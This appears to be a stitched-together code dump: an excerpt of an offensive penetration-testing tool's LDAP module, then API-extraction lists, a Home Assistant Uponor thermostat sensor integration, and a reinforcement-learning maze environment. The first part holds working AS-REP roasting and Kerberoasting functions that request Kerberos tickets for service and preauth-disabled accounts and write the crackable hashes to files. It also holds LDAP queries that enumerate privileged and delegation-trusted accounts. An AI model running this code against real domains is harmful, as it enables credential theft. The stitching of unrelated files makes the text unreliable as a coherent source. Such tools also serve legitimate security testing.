logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.highlight("No entries found!")
return
self.logger.error("Error with the LDAP account used")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 0)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
|
[
"cme.helpers.bloodhound.add_user_bh",
"logging.debug",
"impacket.krb5.types.Principal",
"impacket.ldap.ldap.LDAPConnection",
"cme.logger.CMEAdapter",
"impacket.krb5.kerberosv5.getKerberosTGS",
"impacket.smbconnection.SMBConnection",
"cme.protocols.ldap.kerberos.KerberosAttacks"
] |
[((4128, 4230), 'cme.logger.CMEAdapter', 'CMEAdapter', ([], {'extra': "{'protocol': 'SMB', 'host': self.host, 'port': '445', 'hostname': self.hostname\n }"}), "(extra={'protocol': 'SMB', 'host': self.host, 'port': '445',\n 'hostname': self.hostname})\n", (4138, 4230), False, 'from cme.logger import CMEAdapter\n'), ((7814, 7891), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (7842, 7891), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((10075, 10152), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (10103, 10152), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((10791, 10856), 'cme.helpers.bloodhound.add_user_bh', 'add_user_bh', (['self.username', 'self.domain', 'self.logger', 'self.config'], {}), '(self.username, self.domain, self.logger, self.config)\n', (10802, 10856), False, 'from cme.helpers.bloodhound import add_user_bh\n'), ((14291, 14368), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (14319, 14368), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((14938, 15003), 'cme.helpers.bloodhound.add_user_bh', 'add_user_bh', (['self.username', 'self.domain', 'self.logger', 'self.config'], {}), '(self.username, self.domain, self.logger, self.config)\n', (14949, 15003), False, 'from cme.helpers.bloodhound import add_user_bh\n'), ((17212, 17288), 'impacket.smbconnection.SMBConnection', 'SMBConnection', (['self.host', 'self.host', 'None', '(445)'], {'preferredDialect': 'SMB_DIALECT'}), '(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)\n', (17225, 17288), False, 'from impacket.smbconnection import SMBConnection, SessionError\n'), ((17761, 17807), 'impacket.smbconnection.SMBConnection', 'SMBConnection', (['self.host', 'self.host', 'None', '(445)'], {}), '(self.host, self.host, None, 445)\n', (17774, 17807), False, 'from impacket.smbconnection import SMBConnection, SessionError\n'), ((20928, 20976), 'logging.debug', 'logging.debug', (["('Search Filter=%s' % searchFilter)"], {}), "('Search Filter=%s' % searchFilter)\n", (20941, 20976), False, 'import logging\n'), ((34441, 34463), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (34454, 34463), False, 'import logging\n'), ((34803, 34851), 'logging.debug', 'logging.debug', (["('Search Filter=%s' % searchFilter)"], {}), "('Search Filter=%s' % searchFilter)\n", (34816, 34851), False, 'import logging\n'), ((37700, 37722), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (37713, 37722), False, 'import logging\n'), ((40143, 40165), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (40156, 40165), False, 'import logging\n'), ((8306, 8384), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (8334, 8384), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((9730, 9751), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (9745, 9751), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((13920, 13941), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (13935, 13941), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((34250, 34292), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (34263, 34292), False, 'import logging\n'), ((35243, 35348), 'logging.debug', 'logging.debug', (['"""sizeLimitExceeded exception caught, giving up and processing the data received"""'], {}), "(\n 'sizeLimitExceeded exception caught, giving up and processing the data received'\n )\n", (35256, 35348), False, 'import logging\n'), ((37509, 37551), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (37522, 37551), False, 'import logging\n'), ((39952, 39994), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (39965, 39994), False, 'import logging\n'), ((11145, 11223), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (11173, 11223), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((15295, 15373), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (15323, 15373), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((23869, 23911), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (23882, 23911), False, 'import logging\n'), ((26557, 26599), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (26570, 26599), False, 'import logging\n'), ((30654, 30675), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (30669, 30675), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((30858, 30924), 'impacket.krb5.types.Principal', 'Principal', (['SPN'], {'type': 'constants.PrincipalNameType.NT_SRV_INST.value'}), '(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n', (30867, 30924), False, 'from impacket.krb5.types import KerberosTime, Principal\n'), ((30990, 31098), 'impacket.krb5.kerberosv5.getKerberosTGS', 'getKerberosTGS', (['serverName', 'self.domain', 'self.kdcHost', "TGT['KDC_REP']", "TGT['cipher']", "TGT['sessionKey']"], {}), "(serverName, self.domain, self.kdcHost, TGT['KDC_REP'], TGT[\n 'cipher'], TGT['sessionKey'])\n", (31004, 31098), False, 'from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS\n'), ((26816, 26837), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (26831, 26837), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((30119, 30183), 'logging.debug', 'logging.debug', (["('Bypassing disabled account %s ' % sAMAccountName)"], {}), "('Bypassing disabled account %s ' % sAMAccountName)\n", (30132, 30183), False, 'import logging\n'), ((31894, 31936), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (31907, 31936), False, 'import logging\n'), ((31362, 31383), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (31377, 31383), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n')]
|
"""Uponor U@Home integration
Exposes Sensors for Uponor devices, such as:
- Temperature (UponorThermostatTemperatureSensor)
- Humidity (UponorThermostatHumiditySensor)
- Battery (UponorThermostatBatterySensor)
"""
import voluptuous as vol
from requests.exceptions import RequestException
from homeassistant.exceptions import PlatformNotReady
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,
CONF_NAME, CONF_HOST, CONF_PREFIX,
TEMP_CELSIUS,
DEVICE_CLASS_BATTERY, DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE)
import homeassistant.helpers.config_validation as cv
from logging import getLogger
from homeassistant.helpers.entity import Entity
from .uponor_api import UponorClient
from .uponor_api.const import (UNIT_BATTERY, UNIT_HUMIDITY)
_LOGGER = getLogger(__name__)
DEFAULT_NAME = 'Uhome Uponor'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PREFIX): cv.string,
})
async def async_setup_entry(hass, config_entry, async_add_entities):
_LOGGER.info("init setup sensor platform for %s", config_entry)
# return await async_setup_platform(
# hass, config_entry.data, async_add_entities, discovery_info=None
# )
# async def async_setup_platform(
# hass, config, async_add_entities, discovery_info=None
# ) -> bool:
# _LOGGER.info("init setup sensor platform for %s", config)
# host = config[CONF_HOST]
# prefix = config[CONF_PREFIX]
# _LOGGER.info("init setup host %s", host)
# uponor = UponorClient(hass=hass, server=host)
# try:
# await uponor.rescan()
# except (ValueError, RequestException) as err:
# _LOGGER.error("Received error from UHOME: %s", err)
# raise PlatformNotReady
# async_add_entities([UponorThermostatTemperatureSensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# async_add_entities([UponorThermostatHumiditySensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# async_add_entities([UponorThermostatBatterySensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# _LOGGER.info("finish setup sensor platform for Uhome Uponor")
# return True
def setup_platform(hass, config, add_entities, discovery_info=None):
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
prefix = config.get(CONF_PREFIX)
uponor = UponorClient(hass=hass, server=host)
try:
uponor.rescan()
except (ValueError, RequestException) as err:
_LOGGER.error("Received error from UHOME: %s", err)
raise PlatformNotReady
add_entities([UponorThermostatTemperatureSensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
add_entities([UponorThermostatHumiditySensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
add_entities([UponorThermostatBatterySensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
_LOGGER.info("finish setup sensor platform for Uhome Uponor")
class UponorThermostatTemperatureSensor(Entity):
"""HA Temperature sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_temp"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value}"
@property
def unique_id(self):
return self.identity
@property
def icon(self):
return 'mdi:thermometer'
@property
def available(self):
return self._available
# ** DEBUG PROPERTY **
#@property
#def extra_state_attributes(self):
# """Return the device state attributes."""
# attr = self.thermostat.attributes() + self.uponor_client.uhome.attributes()
# return {
# ATTR_ATTRIBUTION: attr,
# }
# ** Static **
@property
def unit_of_measurement(self):
return TEMP_CELSIUS
@property
def device_class(self):
return DEVICE_CLASS_TEMPERATURE
# ** State **
@property
def state(self):
return self.thermostat.by_name('room_temperature').value
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat temperature sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat temperature sensor was unable to update: %s", ex)
class UponorThermostatHumiditySensor(Entity):
"""HA Humidity sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_rh"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value} Humidity"
@property
def unique_id(self):
return self.identity
@property
def icon(self):
return 'mdi:water-percent'
@property
def available(self):
return self._available
# ** Static **
@property
def unit_of_measurement(self):
return UNIT_HUMIDITY
@property
def device_class(self):
return DEVICE_CLASS_HUMIDITY
# ** State **
@property
def state(self):
return self.thermostat.by_name('rh_value').value
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat humidity sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat humidity sensor was unable to update: %s", ex)
class UponorThermostatBatterySensor(Entity):
"""HA Battery sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_batt"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value} Battery"
@property
def unique_id(self):
return self.identity
@property
def available(self):
return self._available
# ** Static **
@property
def unit_of_measurement(self):
return UNIT_BATTERY
@property
def device_class(self):
return DEVICE_CLASS_BATTERY
# ** State **
@property
def state(self):
# If there is a battery alarm, report a low level - else report 100%
if self.thermostat.by_name('battery_alarm').value == 1:
return 10
return 100
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat battery sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat battery sensor was unable to update: %s", ex)
|
[
"voluptuous.Required",
"voluptuous.Optional",
"logging.getLogger"
] |
[((837, 856), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (846, 856), False, 'from logging import getLogger\n'), ((936, 959), 'voluptuous.Required', 'vol.Required', (['CONF_HOST'], {}), '(CONF_HOST)\n', (948, 959), True, 'import voluptuous as vol\n'), ((976, 1001), 'voluptuous.Optional', 'vol.Optional', (['CONF_PREFIX'], {}), '(CONF_PREFIX)\n', (988, 1001), True, 'import voluptuous as vol\n')]
|
""" Environment with a distribution of mazes (one new maze is drawn at each episode)
Author: <NAME>
"""
import numpy as np
from deer.base_classes import Environment
#import matplotlib
#matplotlib.use('qt5agg')
#from mpl_toolkits.axes_grid1 import host_subplot
#import mpl_toolkits.axisartist as AA
#import matplotlib.pyplot as plt
import copy
import a_star_path_finding as pf
class MyEnv(Environment):
VALIDATION_MODE = 0
def __init__(self, rng, **kwargs):
self._random_state = rng
self._mode = -1
self._mode_score = 0.0
self._mode_episode_count = 0
self._episode_steps = 0
self._actions = [0,1,2,3]
self._size_maze = 8
self._higher_dim_obs=kwargs.get('higher_dim_obs',False)
self._reverse=kwargs.get('reverse',False)
self._n_walls = int((self._size_maze-2)**2/3.)#int((self._size_maze)**2/3.)
self._n_rewards = 3
self.create_map()
self.intern_dim=3
def create_map(self):
valid_map=False
        while not valid_map:
# Agent
self._pos_agent=[1,1]
# Walls
self._pos_walls=[]
for i in range(self._size_maze):
self._pos_walls.append([i,0])
self._pos_walls.append([i,self._size_maze-1])
for j in range(self._size_maze-2):
self._pos_walls.append([0,j+1])
self._pos_walls.append([self._size_maze-1,j+1])
n=0
while n < self._n_walls:
potential_wall=[self._random_state.randint(1,self._size_maze-2),self._random_state.randint(1,self._size_maze-2)]
if(potential_wall not in self._pos_walls and potential_wall!=self._pos_agent):
self._pos_walls.append(potential_wall)
n+=1
# Rewards
#self._pos_rewards=[[self._size_maze-2,self._size_maze-2]]
self._pos_rewards=[]
n=0
while n < self._n_rewards:
potential_reward=[self._random_state.randint(1,self._size_maze-1),self._random_state.randint(1,self._size_maze-1)]
if(potential_reward not in self._pos_rewards and potential_reward not in self._pos_walls and potential_reward!=self._pos_agent):
self._pos_rewards.append(potential_reward)
n+=1
valid_map=self.is_valid_map(self._pos_agent,self._pos_walls,self._pos_rewards)
def is_valid_map(self,pos_agent,pos_walls,pos_rewards):
a = pf.AStar()
walls = [tuple(w) for w in pos_walls]
start=tuple(pos_agent)
for r in pos_rewards:
end=tuple(r)
a.init_grid(self._size_maze, self._size_maze, walls, start, end)
maze=a
optimal_path=maze.solve()
            if optimal_path is None:
return False
return True
    def reset(self, mode):
        self._episode_steps = 0
        self.create_map()
        if mode == MyEnv.VALIDATION_MODE:
            # Compare before assigning self._mode, otherwise the check below
            # could never trigger and the validation score would never reset.
            if self._mode != MyEnv.VALIDATION_MODE:
                self._mode = MyEnv.VALIDATION_MODE
                self._mode_score = 0.0
                self._mode_episode_count = 0
            else:
                self._mode_episode_count += 1
        else:
            self._mode = mode
return [1 * [self._size_maze * [self._size_maze * [0]]]]
def act(self, action):
self._episode_steps += 1
action = self._actions[action]
reward = -0.1
if(action==0):
if([self._pos_agent[0]+1,self._pos_agent[1]] not in self._pos_walls):
self._pos_agent[0]=self._pos_agent[0]+1
elif(action==1):
if([self._pos_agent[0],self._pos_agent[1]+1] not in self._pos_walls):
self._pos_agent[1]=self._pos_agent[1]+1
elif(action==2):
if([self._pos_agent[0]-1,self._pos_agent[1]] not in self._pos_walls):
self._pos_agent[0]=self._pos_agent[0]-1
elif(action==3):
if([self._pos_agent[0],self._pos_agent[1]-1] not in self._pos_walls):
self._pos_agent[1]=self._pos_agent[1]-1
if (self._pos_agent in self._pos_rewards):
reward = 1
self._pos_rewards.remove(self._pos_agent)
self._mode_score += reward
return reward
def summarizePerformance(self, test_data_set, learning_algo, *args, **kwargs):
print ("test_data_set.observations.shape")
print (test_data_set.observations()[0][0:1])
print ("self._mode_score:"+str(self._mode_score)+".")
def inputDimensions(self):
if(self._higher_dim_obs==True):
return [(1,self._size_maze*6,self._size_maze*6)]
else:
return [(1,self._size_maze,self._size_maze)]
def observationType(self, subject):
return np.float32
def nActions(self):
return len(self._actions)
def observe(self):
self._map=np.zeros((self._size_maze,self._size_maze))
for coord_wall in self._pos_walls:
self._map[coord_wall[0],coord_wall[1]]=1
for coord_reward in self._pos_rewards:
self._map[coord_reward[0],coord_reward[1]]=2
self._map[self._pos_agent[0],self._pos_agent[1]]=0.5
if(self._higher_dim_obs==True):
indices_reward=np.argwhere(self._map == 2)
indices_agent=np.argwhere(self._map == 0.5)
self._map=self._map/1.
self._map=np.repeat(np.repeat(self._map, 6, axis=0),6, axis=1)
# agent repr
agent_obs=np.zeros((6,6))
agent_obs[0,2]=0.8
agent_obs[1,0:5]=0.9
agent_obs[2,1:4]=0.9
agent_obs[3,1:4]=0.9
agent_obs[4,1]=0.9
agent_obs[4,3]=0.9
agent_obs[5,0:2]=0.9
agent_obs[5,3:5]=0.9
# reward repr
reward_obs=np.zeros((6,6))
reward_obs[:,1]=0.7
reward_obs[0,1:4]=0.6
reward_obs[1,3]=0.7
reward_obs[2,1:4]=0.6
reward_obs[4,2]=0.7
reward_obs[5,2:4]=0.7
for i in indices_reward:
self._map[i[0]*6:(i[0]+1)*6:,i[1]*6:(i[1]+1)*6]=reward_obs
for i in indices_agent:
self._map[i[0]*6:(i[0]+1)*6:,i[1]*6:(i[1]+1)*6]=agent_obs
self._map=(self._map*2)-1 #scaling
#print ("self._map higher_dim_obs")
#print (self._map)
#plt.imshow(self._map, cmap='gray_r')
#plt.show()
else:
self._map=self._map/2.
self._map[self._map == 0.5] = 0.99 # agent
self._map[self._map == 1.] = 0.5 # reward
if(self._reverse==True):
self._map=-self._map #1-self._map
return [self._map]
def inTerminalState(self):
if ( self._pos_rewards==[] or (self._mode>=0 and self._episode_steps >= 50) ):
return True
else:
return False
if __name__ == "__main__":
import hashlib
rng = np.random.RandomState(123456)
env = MyEnv(rng, higher_dim_obs=False)
maps=[]
for i in range(10000):
env.create_map()
one_laby=env.observe()[0]
# Hashing the labyrinths to be able to find duplicates in O(1)
one_laby=int(hashlib.sha1(str(one_laby).encode('utf-8')).hexdigest(), 16) % (10 ** 8)
# TESTING ADDING DUPLICATION
if i%1000==0:
env.reset(0)
if i%1000==500:
env.reset(1)
maps.append(copy.deepcopy(one_laby))
duplicate_laby=0
for i in range(10000):
env.create_map()
one_laby=env.observe()[0]
# Hashing the labyrinths to be able to find duplicates in O(1)
one_laby=int(hashlib.sha1(str(one_laby).encode('utf-8')).hexdigest(), 16) % (10 ** 8)
# TESTING ADDING DUPLICATION
#if i%1000==0:
# maps.append(one_laby)
# TESTING WITH RESETS
if i%1000==0:
env.reset(0)
if i%1000==500:
env.reset(1)
duplicate=min(maps.count(one_laby),1)
duplicate_laby+=duplicate
if i%1000==0:
print ("Number of duplicate labyrinths:"+str(duplicate_laby)+".")
|
[
"copy.deepcopy",
"numpy.zeros",
"numpy.random.RandomState",
"numpy.argwhere",
"a_star_path_finding.AStar",
"numpy.repeat"
] |
